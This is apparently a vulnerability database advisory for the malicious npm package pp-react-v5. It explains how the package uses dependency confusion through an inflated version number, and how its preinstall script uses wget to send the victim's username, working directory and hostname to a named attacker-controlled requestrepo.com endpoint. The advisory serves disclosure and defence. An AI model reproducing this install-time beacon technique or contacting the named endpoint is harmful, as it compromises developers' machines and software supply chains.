VDB
KO

MAL-2026-3509

Malicious code in pp-react-v5 (npm)

Details

`pp-react-v5` is a dependency confusion package published at the inflated version `10.0.0` to win npm resolution over any internally-hosted package of the same name. The package contains only a `package.json` with no functional source code.

On installation the `preinstall` script executes a `wget` command that sends a GET request to `http://q9ou9xtw.requestrepo.com/` with the current username (`whoami`), working directory (`pwd`), and hostname as query parameters, beaconing the victim machine's identity to the attacker-controlled endpoint.

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (667950ffe2ed24a98495c0d8d6c3430e3538523c5811caf9fbda829b0773163f) The package pp-react-v5 was found to contain malicious code.

## Source: ossf-package-analysis (b2291adfbdded958f2fa2a51aa5e582d8ec4bad5bb1c5c9b614bd496732c3578) The OpenSSF Package Analysis project identified 'pp-react-v5' @ 10.0.0 (npm) as malicious.

It is considered malicious because:

- The package executes one or more commands associated with malicious behavior.

Are you affected?

Enter the version of the package you're using.

Affected packages

npm / pp-react-v5
Introduced in: 0

No fixed version published yet for pp-react-v5 (npm). Pin to a known-safe version or switch to an alternative.